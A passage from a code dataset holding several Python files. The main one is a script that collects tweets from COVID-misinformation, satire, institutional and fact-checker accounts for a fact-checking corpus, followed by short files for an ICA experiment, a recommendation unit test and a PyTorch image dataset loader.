temporal windows ends, the number of requests are restarted.\n Nevertheless, the code has been developed to manage and inform about these\n temporal windows and to continue the tweets extraction. \n \n Moreover, you should be aware that Twitter Policy only allows to extract \n tweets within the las 7 days (30 days for Premium API). \n\n The tweets collected are saved as json files. The Twitter accounts without\n tweets available for the date selected do not create json files. The information\n saved in the json files are the following ones: \n - account name\n - tweet id\n - full text (both tweet and retweet)\n - verification of the account\n - tweet date creation\n - nº of times retweeted\n - favourites count\n - tweet location (if available)\n - account url \n - tweet entities (url, hastags, etc)\n\nUsage: \n python Tweet_wrapper_v2.py [options]\n\nOptions:\n -t, --today Collect tweets from today\n -d, --day Number of days to go back in time to collect tweets. Ex: 1 = yesterday.\n -c, --count Number of tweets collected per user. Directly related with computing time. Default: 200 \n --git_token Token needed to access the Github repository where the results will be saved\n --git_repo Repository where you want to save the json file generated after tweet extraction\n --tweets_source_info Information. Show the Twitter accounts used for the tweets extraction\n --git_autor GitHub changes author\n --git_autor_email E-mail author\n --api_key CONSUMER_KEY\n --api_secret_key CONSUMER_SECRET\n --access_token ACCESS TOKEN \n --access_token_secret ACCESS TOKEN SECRET\n --save_local Bool. If data should be save locally\n --local_path Path to save data locally. Default: \"../local_tweets/\"\n --mongo_user MongoDB user\n --mongo_pass MongoDB password\n --mongo_dbname MongoDB databse name\n --mongo_collection MongoDB collection name\n \nRequirements:\n -> tweepy (pip install -U -q tweepy)\n -> emoji (pip install -U -q emoji)\n -> github (pip install -U -q PyGithub)\n -> tqdm (pip install -U -q tqdm)\n -> requests_oauthlib (pip install -U -q requests-oauthlib)\n -> pymongo (pip install pymongo)\n \n Furthermore, you should have a GitHub account and a Twitter Developer API\n credentials. \n\nExample. \n\nCollect up to 100 tweets from today, save them locally and on GitHub:\n $ python Tweet_wrapper_v2.py -t -c 100 \\\n --save_local --local_path \"../local_tweets\" \\\n --git_token XXX --git_repo Huertas97/tweets_collection \\\n --api_key XXX --api_secret_key XXX --access_token XXX --access_token_secret \n \nCollect up to 200 tweets from yesterday, save them locally (not GitHub): \n $ python Tweet_wrapper_v2.py -d 1 -c 200 \\\n --save_local --local_path \"../local_tweets\" \\\n --api_key XXX --api_secret_key XXX --access_token XXX --access_token_secret \n\nCollect up to 40 tweets from 4 days ago, save them locally and on MongoDB (not GitHub): \n $ python Tweet_wrapper_v2.py -d 4 -c 40 \\\n --save_local --local_path \"../local_tweets\" \\\n --mongo_user Huertas97 --mongo_pass XXX \\\n --mongo_dbname fact-check-tweet-collection \\\n --mongo_collection tweets\n --api_key XXX --api_secret_key XXX --access_token XXX --access_token_secret\n \"\"\")\n sys.exit()\n\n\n\ndef process_time(api):\n \"\"\"\n Function in charge of extracting the remaining number of requests allowed by\n the Twitter API. It also indicates when the time window is renewed\n to continue the tweet extraction.\n\n Parameters\n ----------\n api : API object\n API session\n\n Returns\n -------\n None.\n\n \"\"\"\n # Get the number of remaining requests\n remaining = int(api.last_response.headers['x-rate-limit-remaining'])\n print(\"Remaining requests:\", remaining)\n reset = int(api.last_response.headers['x-rate-limit-reset'])\n reset = datetime.datetime.fromtimestamp(reset)\n print(\"Requests reset at: \", reset)\n\ndef tweet_collect(user_name, text_query, since_date, count, language, result_type):\n \"\"\"\n Function in charge of making the request to Twitter of a user and collect his\n tweets.\n\n Parameters\n ----------\n user_name : string\n Twitter account name\n text_query : string\n Filtros que aplicar a la búsqueda. Ej. \"from: Usuario\" solo busca en\n ese usuario\n since_date: datetime\n Filters to apply to the search. E.g. \"from: User\" only searches in\n that user\n count : int, optional\n Nº of tweets to extract. The default is 200\n language : string, optional\n Language filter. The default is \"es\".\n\n Returns\n -------\n tweets_df : pandas data frame\n Data Frame containing tweets in the rows and columns: the id,\n the full text, account verification, creation date,\n the location of the account url and the entities of each tweet\n extracted.\n\n \"\"\"\n \n query = text_query + user_name\n \n\n \n print(\"\\nCollecting tweets from user {0}, date: {1}\".format(user_name, since_date.date()))\n next_day = since_date + datetime.timedelta(1)\n try:\n # Creation of query method using parameters\n tweets = tweepy.Cursor(api.search,\n q=query,\n lang=language,\n tweet_mode='extended',\n result_type = result_type,\n until = next_day.date()\n ).items(count)\n \n # Teets info extraction\n tweets_list = []\n for tweet in tweets:\n if since_date.date() == tweet.created_at.date():\n # Fulltext (both retweet or tweet)\n if 'retweeted_status' in tweet._json:\n is_retweet = True\n full_text = tweet._json['retweeted_status']['full_text']\n else:\n is_retweet = False\n full_text = tweet.full_text\n tweets_list.append([tweet.user.screen_name,\n tweet.id,\n is_retweet,\n full_text,\n tweet.user.verified,\n str(tweet.created_at),\n tweet.retweet_count, \n tweet.favorite_count,\n # tweet.reply_count, \n # tweet.retweeted_status,\n tweet.user.location,\n tweet.user.url,\n tweet.entities\n ])\n # We show the request number and available time window from the API\n process_time(api)\n # Data frame creation\n print(\"Number of tweets collected:\", len(tweets_list))\n if len(tweets_list) != 0:\n # Creation of dataframe from tweets list\n tweets_df = pd.DataFrame(tweets_list, columns=[\"screen_name\",\n \"tweet_id\",\n \"is_retweet\",\n \"text\",\n \"user_verified\",\n \"created_at\",\n \"retweet_count\",\n \"favorite_count\",\n # \"reply_count\",\n # \"retweet_status\",\n \"user_location\",\n \"user_url\",\n \"entities\"])\n # Procesamos los emojis a unicode\n tweets_df[\"text\"] = tweets_df[\"text\"].apply(emoji.demojize)\n \n return tweets_df\n else:\n pass\n\n except BaseException as e:\n print('failed on_status,', str(e))\n time.sleep(3)\n\n\ndef push(path, message, content, author, author_mail, branch = \"main\"):\n \"\"\"\n Function in charge of uploading the dehydrated TXT files to GitHub.\n\n Parameters\n ----------\n path : string\n File path to upload to GitHub.\n message : string\n Commit message\n content : json\n TXT file content\n branch : string, optional\n Branch to push TXT file. The default is \"main\".\n\n Returns\n -------\n None.\n\n \"\"\"\n author = InputGitAuthor(\n author,\n author_mail\n )\n try: # If file already exists, update it\n # Retrieve old file to get its SHA and path\n contents = repo.get_contents(path, ref=branch)\n repo.update_file(contents.path,\n message,\n content,\n contents.sha,\n branch=branch,\n author=author) # Add, commit and push branch\n print(\"Update:\", path)\n print()\n except: # If file doesn't exist, create it\n repo.create_file(path,\n message,\n content,\n branch=branch,\n author=author) # Add, commit and push branch\n print(\"Creating:\", path)\n print()\n\n\n# Number of option arguments. First arguments is always the own file name\nnumOpts = len(sys.argv)\n\n# No options... print help.\nif numOpts < 2:\n print_usage()\nelif options.help:\n print_usage()\n \n# Twiiter Accounts\ndic_user = {\n # Hastags\n \"Plandemia\": [\"es\", \"#\", \"mixed\"],\n \"yonomeconfino\": [\"es\", \"#\", \"mixed\"],\n \"coronatimo\": [\"es\", \"#\", \"mixed\"],\n \"YoNoMeVacuno\": [\"es\", \"#\", \"mixed\"],\n \"covid1984\": [\"es\", \"#\", \"mixed\"],\n \"NoalaVacuna\": [\"es\", \"#\", \"mixed\"],\n \"#VirusChino\": [\"es\", \"#\", \"mixed\"],\n \"#VacunaRusa\": [\"es\", \"#\", \"mixed\"],\n \"#PCRFraude\": [\"es\", \"#\", \"mixed\"],\n \"#FactCHAT\": [\"en\", \"#\", \"mixed\"],\n \"#FakePCR\": [\"es\", \"#\", \"mixed\"],\n # infodemia \n \n \n # Not checked\n \"No__Plandemia\": [\"es\", \"from:\"],\n \"ANTIMASCARILLA\": [\"es\", \"from:\"],\n \"FoxMuld88326271\": [\"es\", \"from:\"],\n \"PericoAFuego\": [\"es\", \"from:\"],\n \"DiegoMo53772865\": [\"es\", \"from:\"],\n \"the_raven77\": [\"es\", \"from:\"],\n \"LRsecreta\": [\"es\", \"from:\"],\n \"JL_MDesconocido\": [\"es\", \"from:\"],\n \"AtraviesaLoDesc\": [\"es\", \"from:\"],\n \"HomeopatiaY\": [\"es\", \"from:\"],\n \"NaturopatasCol\": [\"es\", \"from:\"],\n \"MiHerbolario\": [\"es\", \"from:\"],\n \"HerbolarioLola\": [\"es\", \"from:\"],\n \"PacienteL\": [\"es\", \"from:\"],\n \"elphabaz\": [\"es\", \"from:\"],\n \"IsTortugo\": [\"es\", \"from:\"],\n \"tecn_preocupado\": [\"es\", \"from:\"],\n \"BabylonDab\": [\"es\", \"from:\"],\n \"lamjort\": [\"es\", \"from:\"],\n \"VaccineXchange\": [\"en\", \"from:\"],\n \"gonzo_blogger\": [\"es\", \"from:\"],\n \"CarmCerb21\": [\"es\", \"from:\"],\n \"panguerrera1\": [\"es\", \"from:\"],\n \"AlbaGar74381296\": [\"es\", \"from:\"],\n \"MediterraneoDGT\": [\"es\", \"from:\"],\n \"JosPastr\": [\"es\", \"from:\"],\n \"velardedaoiz2\": [\"es\", \"-filter:replies AND-filter:retweet AND from:\"],\n \"JordiFlynn\": [\"es\", \"(coronavirus OR cov OR covid OR sars) AND from:\"],\n \"mitokondriac\": [\"es\", \"from:\"],\n \"AquAhora1\": [\"es\", \"from:\"],\n \"patrilaselma\": [\"es\", \"from:\"],\n \"doctor_papaya\": [\"es\", \"from:\"],\n \"Autnomacabread1\": [\"es\", \"(virus OR coronavirus OR covid OR sars) AND from:\"],\n \"LaRetuerka\": [\"es\", \"from:\"],\n \"DathosBD\": [\"es\", \"-filter:replies AND (virus OR coronavirus OR covid OR sars) AND from:\"],\n \"PorunChileDigno\": [\"es\", \"-filter:replies AND from:\"], # Chile\n \"1333Despierta\": [\"es\", \"-filter:replies AND from:\"],\n \"NoHayPandemia__\": [\"es\", \"-filter:replies AND from:\"],\n \"Musicolorista\": [\"es\", \"-filter:replies AND from:\"],\n \"ELMINIMALISTA1\": [\"es\", \"-filter:replies AND from:\"],\n \"Africamar\": [\"es\", \"-filter:replies AND from:\"],\n \"informate_infor\": [\"es\", \"-filter:replies AND from:\"],\n \"ElTrompetista78\": [\"es\", \"-filter:replies AND from:\"],\n \"Angelisimo2\": [\"es\", \"-filter:replies AND from:\"],\n \"_nWorder\": [\"es\", \"-filter:replies AND from:\"],\n \"papayaykware\": [\"es\", \"-filter:replies AND from:\"],\n \"trustdall271\": [\"es\", \"-filter:replies AND from:\"],\n \"elentirvigo\": [\"es\", \"-filter:replies AND from:\"],\n \"ProgreAzote\": [\"es\", \"-filter:replies AND from:\"],\n \"The_Cling_On\": [\"en\", \"from:\"], # Australia\n \n \n # Satire\n \"elmundotoday\": [\"es\", \"from:\"],\n \"eljueves\": [\"es\", \"from:\"],\n \"okdiario\": [\"es\", \"from:\"],\n \"LaVozdelBecario\": [\"es\", \"from:\"],\n \"HayNoticia\": [\"es\", \"from:\"],\n \"FrayJosepho\": [\"es\", \"from:\"],\n \"ChiguireBipolar\": [\"es\", \"from:\"], # Venezuela\n \"actualidadpanam\": [\"es\", \"from:\"],# Colombia\n \"revisbarcelona\": [\"es\", \"from:\"],# Argentina\n \"thecliniccl\": [\"es\", \"from:\"],# Chile\n \"TheBabylonBee\": [\"en\", \"from:\"], # US \n \"TheOnion\": [\"en\", \"from:\"], # US \n \n \n \n # Doubtful\n \"tiramillas\": [\"es\", \"from:\"],\n \"20m\": [\"es\", \"from:\"],\n \"ActualidadRT\": [\"es\", \"from:\"],\n \"ldpsincomplejos\": [\"es\", \"-filter:replies AND from:\"],\n \"hermanntertsch\": [\"es\", \"-filter:replies AND -filter:retweet AND from:\"],\n \"NiusDiario\": [\"es\", \"from:\"], # no es tan dudoso pero habría que chequear\n \"LaVozIberica\": [\"es\", \"from:\"],\n \"periodistadigit\": [\"es\", \"from:\"],\n \"CancerIntegral\": [\"es\", \"from:\"],\n \n # Donald Trump in Spanish\n \"POTUS_Trump_ESP\": [\"es\", \"-filter:replies AND -filter:retweet AND from:\"],\n \n # Institutions\n \"SaludPublicaEs\": [\"es\", \"from:\"],\n \"sanidadgob\": [\"es\", \"from:\"],\n \"andaluciadatos\": [\"es\", \"from:\"],\n \"opsoms\": [\"es\", \"from:\"],\n \"WHO\": [\"en\", \"from:\"],\n \"AEMPSGOB\": [\"es\", \"from:\"], # spanish drug agency\n \"FDAenEspanol\": [\"es\", \"from:\"],\n \"CDCespanol\": [\"es\", \"from:\"],\n \"policia\": [\"es\", \"from:\"],\n \"guardiacivil\": [\"es\", \"from:\"],\n \"US_FDA\": [\"en\", \"from:\"],\n \"FDA_Drug_Info\": [\"en\", \"from:\"],\n \"FDArecalls\": [\"en\", \"from:\"],\n \"CDCgov\": [\"en\", \"from:\"],\n \"NIH\": [\"en\", \"from:\"],\n \"NEJM\": [\"en\", \"from:\"],\n \"HopkinsMedicine\": [\"en\", \"from:\"],\n \"MayoClinic\": [\"en\", \"from:\"],\n \n # Scientific magazines\n \"NatureComms\": [\"en\", \"from:\"],\n \"researchnews\": [\"en\", \"from:\"],\n \"CellPressNews\": [\"en\", \"from:\"],\n \"TrendsMolecMed\": [\"en\", \"from:\"],\n \"embojournal\": [\"en\", \"from:\"],\n \n # Fact-checkers\n \"malditobulo\": [\"es\", \"from:\"], # España\n \"maldita_ciencia\": [\"es\", \"from:\"], # España\n \"EFEVerifica\": [\"es\", \"from:\"], # España\n \"Chequeado\": [\"es\", \"from:\"], # Argentina\n \"Newtral\": [\"es\", \"from:\"], # España\n \"FullFact\": [\"en\", \"from:\"], # Inglés\n \"ElSabuesoAP\": [\"es\", \"from:\"], # Mexico\n \"cotejoinfo\": [\"es\", \"from:\"], # Venezuela\n \"ECUADORCHEQUEA\": [\"es\", \"from:\"], # Ecuador\n \"lasillavacia\": [\"es\", \"from:\"], # Colombia\n \"AP\": [\"en\", \"from:\"], # US\n \"AfricaCheck\": [\"en\", \"from:\"], # Africa\n \"aosfatos\": [\"pt\", \"from:\"], # Brasil\n \"AAPNewswire\": [\"en\", \"from:\"], # Australia\n \"boomlive_in\": [\"en\", \"from:\"], # India\n \"correctiv_org\": [\"de\", \"from:\"], # Alemania\n \"Check_Your_Fact\": [\"en\", \"from:\"], # USA\n \"CheckCongo\": [\"fr\", \"from:\"], # Congo\n \"DemagogPL\": [\"pl\", \"from:\"], # Polonia\n \"dubawaNG\": [\"en\", \"from:\"], # Nigeria\n \"estadaoverifica\": [\"pt\", \"from:\"], # Brasil\n \"FactlyIndia\": [\"en\", \"from:\"], # India\n \"FactCrescendo\": [\"en\", \"from:\"], # India\n \"FactCheckNI\": [\"en\", \"from:\"], # United Kingdom\n \"ghana_fact\": [\"en\", \"from:\"], # Ghana\n \"Fatabyyano_com\": [\"ar\", \"from:\"], # Jordania\n \"FerretScot\": [\"en\", \"from:\"], # United Kingdom (Scotland)\n \"Observateurs\": [\"fr\", \"from:\"], # Francia\n \"lemondefr\": [\"fr\", \"from:\"], # Francia\n \"CheckNewsfr\": [\"fr\", \"from:\"], # Australia\n \"LogicallyAI\": [\"en\", \"from:\"], # United Kingdom\n \"MaharatNews\": [\"ar\", \"from:\"], # Libano\n \"Poynter\": [\"en\", \"from:\"], # Internacional\n \"mediawise\": [\"en\", \"from:\"], # USA\n \"NewsMobileIndia\": [\"en\", \"from:\"], # India\n \"NewsMeter_In\": [\"en\", \"from:\"], # India\n \"observadorpt\": [\"pt\", \"from:\"], # Portugal\n \"PesaCheck\": [\"en\", \"from:\"], # Kenya\n \"JornalPoligrafo\": [\"pt\", \"from:\"], # Portugal\n \"ABCFactCheck\": [\"en\", \"from:\"], # Australia\n \"rapplerdotcom\": [\"en\", \"from:\"], # Filipinas\n \"ReutersAgency\": [\"en\", \"from:\"], # United States\n \"ClimateFdbk\": [\"en\", \"from:\"], # France\n \"eye_digit\": [\"en\", \"from:\"], # India\n \"SouthAsiaCheck\": [\"en\", \"from:\"], # Nepal\n \"StopFakingNews\": [\"ru\", \"from:\"], # Ucrania\n \"IndiaToday\": [\"en\", \"from:\"], # India\n \"factchecknet\": [\"en\", \"from:\"], # Internacional\n \"thedispatch\": [\"en\", \"from:\"], # USA\n \"ThipMedia\": [\"en\", \"from:\"], # India\n \"TheQuint\": [\"en\", \"from:\"], # India\n \"GlennKesslerWP\": [\"en\", \"from:\"], # chief writer of Washington Post's Fact Checker\n \"thejournal_ie\": [\"en\", \"from:\"], # Ireland\n \"USATODAY\": [\"en\", \"from:\"], # USA\n \"verafiles\": [\"en\", \"from:\"], # Filipinas\n \"newsvishvas\": [\"en\", \"from:\"], # India\n \"dpa\": [\"de\", \"from:\"], # Alemania\n \"dogrulukpayicom\": [\"tr\", \"from:\"], # Turquia\n \"PagellaPolitica\": [\"it\", \"from:\"], # Italia\n \"teyitorg\": [\"tr\", \"from:\"], # Turquia\n \"NUnl\": [\"nl\", \"from:\"], # Holanda\n \"snopes\": [\"en\", \"from:\"], # USA\n \"franceinfo\": [\"fr\", \"from:\"], # France\n \n \n # America newspapers\n \"JustiaLatinAmer\": [\"es\", \"from:\"], # Latino América\n \"ReutersLatam\": [\"es\", \"from:\"], # Latino América\n \"UniNoticias\": [\"es\", \"from:\"], # Latino América\n \"14ymedio\": [\"es\", \"from:\"], # Cuba\n \"prensa_libre\": [\"es\", \"from:\"], # Guatemala (Recommended by The Guardian)\n \"ABCDigital\": [\"es\", \"from:\"], # Paraguay (Recommended by The Guardian)\n \"ObservadorUY\": [\"es\", \"from:\"], # Urugay (Recommended by The Guardian) \n \"Milenio\": [\"es\", \"from:\"], # México (Recommended by The Guardian)\n \"ElMercurio_cl\": [\"es\", \"from:\"], # Chile (Recommended by The Guardian)\n \"elcomerciocom\": [\"es\", \"from:\"], # Ecuador (Recommended by The Guardian)\n \"ElMundoBolivia\": [\"es\", \"from:\"], # Bolivia (Recommended by The Guardian)\n \"laprensa\": [\"es\", \"from:\"], # Nicaragua (Recommended by The Guardian)\n \"elespectador\": [\"es\", \"from:\"], # Colombia (Recommended by The Guardian)\n \n # America newspapers renowed\n \"Pajaropolitico\": [\"es\", \"from:\"], # from Poynter\n \"elcomerciodigit\": [\"es\", \"from:\"], # The Trust Project Perú\n \"LANACION\": [\"es\", \"from:\"], # The Trust Project Argetina\n \"ElUniversal\": [\"es\", \"from:\"], # The Trust Project Venezuela\n \n # US newspapers\n \"nytimes\": [\"en\", \"from:\"], # US\n \"AmPress\": [\"en\", \"from:\"], # US\n \n # Spain newspapers\n \"el_pais\": [\"es\", \"from:\"],\n \"eldiarioes\": [\"es\", \"from:\"],\n \"elmundoes\": [\"es\", \"from:\"],\n \"EFEnoticias\": [\"es\", \"from:\"],\n \"abc_es\": [\"es\", \"from:\"],\n \"telediario_tve\": [\"es\", \"from:\"],\n \"24h_tve\": [\"es\", \"from:\"],\n \n # International newspaper\n \"bbcmundo\": [\"es\", \"from:\"], # Internacional\n \n # MEdical magazines from Spain\n \"diariomedico\": [\"es\", \"from:\"],\n \"Consalud_es\": [\"es\", \"from:\"],\n \"redaccionmedica\": [\"es\", \"from:\"],\n \"VaccineSafetyN\": [\"en\", \"from:\"]\n\n}\n\n# Feel free to modify the Twitter accounts showed above\n# dic_user = {\n# # \"US_FDA\": [\"en\", \"from:\"] \n# \"el_pais\": [\"es\", \"from:\"],\n# \"EFEnoticias\": [\"es\", \"from:\"],\n# \"abc_es\": [\"es\", \"from:\"],\n# \"telediario_tve\": [\"es\", \"from:\"],\n# \"24h_tve\": [\"es\", \"from:\"],\n# \"franceinfo\": [\"fr\", \"from:\"]\n# }\n\n\n# Only Fact--checker Twitter accounts will be saved on MongoDB\nchecked_users = ['malditobulo',\n 'maldita_ciencia',\n 'EFEVerifica',\n 'Chequeado',\n 'Newtral',\n 'FullFact',\n 'ElSabuesoAP',\n 'cotejoinfo',\n 'ECUADORCHEQUEA',\n 'lasillavacia',\n 'AP',\n 'AfricaCheck',\n 'aosfatos',\n 'AAPNewswire',\n 'boomlive_in',\n 'correctiv_org',\n 'Check_Your_Fact',\n 'CheckCongo',\n 'DemagogPL',\n 'dubawaNG',\n 'estadaoverifica',\n 'FactlyIndia',\n 'FactCrescendo',\n 'FactCheckNI',\n 'ghana_fact',\n 'Fatabyyano_com',\n 'FerretScot',\n 'Observateurs',\n 'lemondefr',\n 'CheckNewsfr',\n 'LogicallyAI',\n 'MaharatNews',\n 'Poynter',\n 'mediawise',\n 'NewsMobileIndia',\n 'NewsMeter_In',\n 'observadorpt',\n 'PesaCheck',\n 'JornalPoligrafo',\n 'ABCFactCheck',\n 'rapplerdotcom',\n 'ReutersAgency',\n 'ClimateFdbk',\n 'eye_digit',\n 'SouthAsiaCheck',\n 'StopFakingNews',\n 'IndiaToday',\n 'factchecknet',\n 'thedispatch',\n 'ThipMedia',\n 'TheQuint',\n 'GlennKesslerWP',\n 'thejournal_ie',\n 'USATODAY',\n 'verafiles',\n 'newsvishvas',\n 'dpa',\n 'dogrulukpayicom',\n 'PagellaPolitica',\n 'teyitorg',\n 'NUnl',\n 'snopes',\n 'franceinfo']\n\ndef print_tweets_source_info(dic_user):\n print(\"\"\"Twitter accounts used by default:\"\"\")\n print(sorted(list(dic_user.keys())))\n sys.exit()\n \nif options.tweets_source_info:\n print_tweets_source_info(dic_user) \n \n \nif not all([options.api_key, options.api_secret_key,\n options.access_token, options.access_token_secret\n ]) or options.help:\n print_usage() \n \nif options.today: # and not options.yesterday: \n # Create date starting from 00:00h\n now_datetime = datetime.datetime.now()\n since_date = now_datetime.replace(hour=23, minute=59, second=59,\n microsecond=999999)\n \nif options.day:\n since_date = datetime.datetime.now() - datetime.timedelta(options.day)\n since_date = since_date.replace(hour=23, minute=59, second=59, \n microsecond=999999)\n# Default number of tweets\nif not options.count:\n options.count = 200\n \n\n\n# CREDENTIALS for Twitter API \napi_key = options.api_key\napi_secret_key = options.api_secret_key\naccess_token = options.access_token\naccess_token_secret = options.access_token_secret\n\n\n# GitHub option\nif options.git_token and options.git_repo:\n g = Github(options.git_token)\n repo = g.get_repo(options.git_repo)\n print(\"----------- Saving tweets on GitHub: {}-----------\".format(repo)) \n \n if options.git_autor:\n autor = options.git_autor\n else:\n autor = \"Huertas97\"\n\n if options.git_autor_email:\n email = options.git_autor_email\n else:\n email = \"ahuertasg01@gmail.com\"\n\nelse: \n print(\"----------- Tweets will not be stored on GitHub -----------\") \n \n\n# Local option\nif options.save_local:\n print(\"----------- Saving tweets locally on: {} -----------\".format(options.local_path)) \nelse: \n print(\"----------- Tweets will not be stored locally -----------\") \n\n\n# Save in MongoDB\nif all([options.mongo_user, options.mongo_pass, options.mongo_dbname,\n options.mongo_collection]):\n print(\"----------- Saving tweets on MongoDB. db: {}, collection: {} -----------\".format(options.mongo_dbname,\n options.mongo_collection)) \nelse: \n print(\"----------- Tweets will not be stored on MongoDB-----------\") \n\n# STARTING Twitter API\ntwitter = OAuth1Session(api_key,\n client_secret=api_secret_key,\n resource_owner_key=access_token,\n resource_owner_secret=access_token_secret)\n\n## Access to the App per user \n# OAuth 1a (application-user). Rate limit: 180 requests in 15 min window\n# auth = tweepy.OAuthHandler(api_key, api_secret_key)\n# auth.set_access_token(access_token, access_token_secret)\n\n## Access to the App directly (more amount of requests available)\n# OAuth 2 (application-only). Rate limit: 450 requets in 15 min window\nauth = tweepy.AppAuthHandler(api_key, api_secret_key)\n\n# When we set wait_on_rate_limit to True, we will have our program wait\n# automatically 15 minutes so that Twitter does not lock us out, whenever we\n# exceed the rate limit and we automatically continue to get new data!\napi = tweepy.API(auth, wait_on_rate_limit=True)\n\n\n\n\n# today = datetime.date.today()\ndate = since_date.date()\nprint(date)\n\n\n\n\ndef json2dic(file_name, root):\n file_path = os.path.join(root, file_name)\n with open(file_path) as f:\n data = json.load(f)\n return data\n\n\n\n\nfor key, value in tqdm(dic_user.items(), desc=\"Progess\"):\n user_name = key\n language = value[0]\n text_query = value[1]\n try:\n result_type = value[2]\n except:\n result_type = \"recent\"\n tweets_df = tweet_collect(count = options.count,\n language = language,\n text_query = text_query,\n user_name = user_name,\n result_type = result_type,\n since_date=since_date\n )\n \n \n \n # If a df is returned push it\n if isinstance(tweets_df, pd.DataFrame):\n \n \n # Save locally\n if options.save_local:\n # create folders and move json file to that folder by date\n local_folder = os.path.join(options.local_path, str(date))\n os.makedirs(local_folder, exist_ok=True)\n local_file_name = user_name+\"-\"+str(date)+\".json\"\n \n # Pandas df to json format\n tweets_df.to_json(os.path.join(local_folder, local_file_name))\n \n \n\n # Save on GitHub\n if options.git_token and options.git_repo:\n # create folders and move json file to that folder by date\n os.makedirs(os.path.join(\"./tweets\", str(date)), exist_ok=True)\n git_file_name = user_name+\"-\"+str(date)+\".txt\"\n git_file_path = os.path.join(\"./tweets\", str(date), git_file_name)\n \n # Extract tweets_id and save it as txt\n tweets_df[\"tweet_id\"].to_csv(git_file_path, header=None, index=None, sep=' ', mode='w')\n\n # GitHub will only receive tweets ids (Twitter Privacy Conditions)\n # Extract the content to push\n file_content = open(git_file_path.replace(\"\\\\\",\"/\") , \"r\").read()\n push(path = git_file_path.replace(\"\\\\\",\"/\"), message = \"Tweets from: \" + str(date), content = file_content,\n author = autor, author_mail = email)\n \n # Save on MongoDB\n if all([options.mongo_user, options.mongo_pass, options.mongo_dbname,\n options.mongo_collection]):\n mongo_file_name = user_name+\"-\"+str(date)+\".json\"\n\n mongo_user = options.mongo_user\n mongo_pass = options.mongo_pass\n mongo_dbname = options.mongo_dbname\n mongo_collection = options.mongo_collection\n client = MongoClient(\"mongodb+srv://\" + mongo_user + \":\" +\n mongo_pass + \"@fact-check-tweet-collec.oaort.mongodb.net/\" + \n mongo_dbname + \"?retryWrites=true&w=majority\")\n db = client[mongo_dbname] # [\"fact-check-tweet-collection\"]\n collection = db[mongo_collection]\n \n \n # Check and delete if file already exists in MongoDB collection \n creation_date = tweets_df.created_at.to_list()[0]\n collection.find_one_and_delete({ \"screen_name.0\": user_name, \"created_at.0\": str(creation_date) })\n # print(tweets_df.head())\n \n if mongo_file_name.split(\"-\")[0] in checked_users: \n json_file = tweets_df.to_json()\n mongo_file_content = json.loads(json_file)\n collection.insert_one(mongo_file_content)\n \n \n \n \n \n","sub_path":"Tweet_wrapper_v2.py","file_name":"Tweet_wrapper_v2.py","file_ext":"py","file_size_in_byte":33952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"152833865","text":"import numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\n\nfrom sklearn.decomposition import FastICA\n\nticker = 'TSLA2016'\ndf = pd.read_csv('db' + '/{0}.csv'.format(ticker), parse_dates = True)\n\ndf.set_index('Date', inplace = True)\n\nif 'Volume' in df.columns:\n df = df[df['Volume'] != 0]\n\ndf['ids'] = np.linspace(0,1,len(df))\n\ndf['Close'] = df['Close'].apply(lambda X: (X - min(df['Close']))/(max(df['Close']) - min(df['Close'])))\n\n# X[:,1] = (X[:,1] - min(X[:,1]) )/( max(X[:,1]) - min(X[:,1]))\nX = np.array(list(zip(df['ids'],df['Close']))) * np.random.rand(len(df), 2)\n\nica = FastICA()\nS_ica = ica.fit(X)\n\nres = S_ica.transform(X)\n\nplt.scatter(X[:,0], X[:,1])\nplt.scatter(res[:,0], res[:,1])\n\nplt.show()","sub_path":"Tests/Tools_Tests/ICA_test.py","file_name":"ICA_test.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"530960057","text":"import unittest\nfrom website.recom import *\n\n\nclass TestRecom(unittest.TestCase):\n\n def test_recom(self):\n test_df_team = pd.read_csv(\"test_comps\")\n test_df_items = pd.read_csv(\"test_item\")\n result = recommendation([], test_df_team, test_df_items)\n self.assertEqual(result.shape[0], 20)\n self.assertEqual(result.iloc[0,1], \"Chosen Duelists\")\n","sub_path":"functests/test_recom.py","file_name":"test_recom.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"489560639","text":"\"\"\"PyTorch-compatible datasets. Cf: https://pytorch.org/docs/stable/data.html \"\"\"\n\nimport os\nimport glob\nimport sys\n\nimport cv2\nimport numpy as np\nfrom PIL import Image\n\nimport torch\nimport torch.utils.data\n\nclass DatasetFiles(torch.utils.data.Dataset):\n \"\"\"Dataset for images stored in slippy map format.\"\"\"\n\n def __init__(self, root, mode, transform=None):\n super().__init__()\n\n self.files = []\n self.transform = transform\n\n root = os.path.expanduser(root)\n self.files = [path for path in glob.glob(os.path.join(root, \"*.*\"))]\n self.files.sort(key=lambda file: file)\n self.mode = mode\n\n def __len__(self):\n return len(self.files)\n\n def __getitem__(self, i):\n path = self.files[i]\n\n if self.mode == \"mask\":\n image = np.array(Image.open(path).convert(\"P\"))\n\n elif self.mode == \"image\":\n path = os.path.expanduser(path)\n image = cv2.imread(path, cv2.IMREAD_ANYCOLOR)\n\n if self.transform is not None:\n image = self.transform(image)\n\n return image,path\n\n\nclass DatasetFilesConcat(torch.utils.data.Dataset):\n \"\"\"Dataset to concate multiple input images stored in slippy map format.\"\"\"\n\n def __init__(self, path, channels, target, joint_transform=None):\n super().__init__()\n\n assert len(channels)\n self.channels = channels\n self.inputs = dict()\n\n for channel in channels:\n for band in channel[\"bands\"]:\n self.inputs[channel[\"sub\"]] = DatasetFiles(os.path.join(path, channel[\"sub\"]), mode=\"image\")\n\n self.target = DatasetFiles(target, mode=\"mask\")\n self.joint_transform = joint_transform\n\n def __len__(self):\n return len(self.target)\n\n def __getitem__(self, i):\n\n mask,path = self.target[i]\n\n for channel in self.channels:\n try:\n data,path = self.inputs[channel[\"sub\"]][i]\n\n for band in channel[\"bands\"]:\n data_band = data[:, :, int(band) - 1] if len(data.shape) == 3 else []\n data_band = data_band.reshape(mask.shape[0], mask.shape[1], 1)\n tensor = np.concatenate((tensor, data_band), axis=2) if \"tensor\" in locals() else data_band # noqa F821\n except:\n sys.exit(\"Unable to concatenate input Tensor\")\n\n if self.joint_transform is not None:\n tensor, mask = self.joint_transform(tensor, mask)\n\n return tensor, 